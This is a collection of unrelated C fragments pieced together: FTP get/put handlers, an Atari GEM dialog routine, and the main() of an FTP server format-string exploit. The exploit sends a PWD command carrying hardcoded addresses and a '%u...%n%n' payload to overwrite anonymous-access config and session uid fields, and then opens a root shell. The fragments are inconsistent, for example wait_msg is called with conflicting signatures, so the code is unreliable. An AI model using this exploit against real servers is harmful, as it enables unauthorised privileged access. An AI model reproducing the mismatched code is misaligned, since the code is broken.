int cmd_get(int cs, char *cmd)
{
int file;
struct stat buf;
void *ptr;
char *totsize;
if ((file = get_fd(cmd, cs)) == -1)
return (-1);
if (wait_msg("FILE_OK", cs) < 1)
return (1);
if ((fstat(file, &buf)) == -1)
return (send_error(cs, "ERROR server : fstat()."));
if ((ptr = mmap(NULL, buf.st_size, PROT_READ, MAP_PRIVATE, file, 0))
== MAP_FAILED)
return (send_error(cs, "ERROR server : mmap()."));
totsize = ft_itoa(buf.st_size);
ft_putendl_fd(totsize, cs);
free(totsize);
if (wait_msg("GO_SEND", cs) < 1)
return (1);
send(cs, ptr, buf.st_size, 0);
munmap(ptr, buf.st_size);
close(file);
if (wait_msg("SUCCESS", cs) == 1)
send_error(cs, "SUCCESS : file transfert complete.");
return (0);
}
void ftplogin(int sockfd, char *user,char *passwd)
{
char send[500];
memset(send,NULL,500);
snprintf(send,500,"USER %s\r\n",user);
write(sockfd,send,strlen(send));
wait_msg(sockfd);
memset(send,NULL,500);
snprintf(send,500,"PASS %s\r\n",passwd);
write(sockfd,send,strlen(send));
wait_msg(sockfd);
return;
}
int cmd_put(int cs, char *cmd)
{
int file;
struct stat buf;
void *ptr;
if ((file = get_file(cmd, cs)) == -1)
return (-1);
if (wait_msg("FILE_OK", cs) < 1)
{
ft_putendl("ERROR : can't create the file.");
ft_putendl("Perhaps file already exists ?");
return (-1);
}
if ((fstat(file, &buf)) == -1)
{
ft_putendl("ERROR : fstat().");
return (-1);
}
if ((ptr = mmap(NULL, buf.st_size, PROT_READ, MAP_PRIVATE, file, 0))
== MAP_FAILED)
{
ft_putendl("ERROR server : mmap().");
return (-1);
}
return (handle_put(buf, cs, ptr, file));
}
int handle_put(struct stat buf, int cs, void *ptr, int file)
{
char *totsize;
totsize = ft_itoa(buf.st_size);
ft_putendl_fd(totsize, cs);
free(totsize);
if (wait_msg("GO_SEND", cs) < 1)
return (1);
ft_putendl("Uploading in progress. Please wait...");
send(cs, ptr, buf.st_size, 0);
munmap(ptr, buf.st_size);
close(file);
if (wait_msg("SUCCESS", cs) == 1)
ft_putendl("SUCCESS : file transfert complete.");
return (0);
}
VOID
updatbox( char *str)
{
if ( d_display )
{
pack(str,0);
strcpy(str, (BYTE *)((TEDINFO *)(cpbox[CPDIR].ob_spec))->te_ptext);
pack(str,1);
strcpy("_", (BYTE *)((TEDINFO *)(cpbox[CPFILE].ob_spec))->te_ptext);
wind_update( 1 );
draw_loop( whandle,cpbox,HIDECBOX,MAX_DEPTH,0,0,full.g_w,full.g_h );
wind_update( 0 );
if ( wait_msg( whandle, cpbox ) == WM_CLOSE )
f_cancel = TRUE;
}
}
void main(int argc, char **argv)
{
struct sockaddr_in addr;
int sockfd,i;
long port=21,*addrptr;
char c, name[100],pass[100],buf[1024];
/* SET DEFAULTS */
strcpy(name,"ftp");
strcpy(pass,"*****@*****.**");
while((c = getopt(argc,argv,"hn:p:c:")) != EOF)
{
switch(c)
{
case 'h':
usage(argv[0]);
case 'n':
strncpy(name,optarg,100);
break;
case 'p':
strncpy(pass,optarg,100);
break;
case 'c':
port = atol(optarg);
}
}
if((argc - optind) != 1) usage(argv[0]);
bzero(&addr, sizeof(struct sockaddr_in));
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = resolve(argv[optind++]);
printf("Connecting.....");
if((sockfd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{
printf("failed\n");
perror("socket");
exit(-1);
}
if(connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0)
{
printf("failed\n");
perror("connect");
exit(-1);
}
#ifdef DEBUG
sockfd = fileno(stdout);
#endif
wait_msg(sockfd);
printf("success\n");
printf("Logging in <%s>:<%s>\n",name,pass);
ftplogin(sockfd,name,pass);
strcpy(buf,"PWD aaaa");
/* Overwrite config to allow writing
* 0x0187e608: session.anon_config, bad char in 0x0187e60a
* DenyAll is at 0x1885f01 on the box i used for testing
* It just f***s up the string -> DenyAll isn't found -> default is AllowAll
*/
buf[8] = 0x01;
buf[9] = 0x88;
buf[10] = 0x5f;
buf[11] = 0x01;
/* session.disable_idswithing is at 0x187e5ca */
buf[12] = 0x01;
buf[13] = 0x87;
buf[14] = 0xe5;
buf[15] = 0xca;
/* Ugly, Ugly / didn't feel like counting :-) */
strncpy(buf+16,"%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u",NUM);
strcpy(buf+16+NUM,"%n%n\r\n");
write(sockfd,buf,strlen(buf));
sleep(1);
/* 0x0187e5cc: session.uid*/
buf[8] = 0x01;
buf[9] = 0x87;
buf[10] = 0xe5;
buf[11] = 0xcc;
buf[12] = 0x01;
buf[13] = 0x87;
buf[14] = 0xe5;
buf[15] = 0xce;
write(sockfd,buf,strlen(buf));
/* 0x187e5d0: session.ouid */
buf[8] = 0x01;
buf[9] = 0x87;
buf[10] = 0xe5;
buf[11] = 0xd0;
buf[12] = 0x01;
buf[13] = 0x87;
buf[14] = 0xe5;
buf[15] = 0xd2;
write(sockfd,buf,strlen(buf));
/* LIST switches uid to session.ouid to bind to port 20 (ftp-data - privelidged port) */
write(sockfd,"LIST\r\n",6);
/* LIST returns error "No data connection" */
do{
read(sockfd,buf,sizeof(buf));
}while(strstr(buf,"connection") == NULL);
printf("Opening shell-connection\n");
shell(sockfd);
printf("THE END\n");
close(sockfd);
}
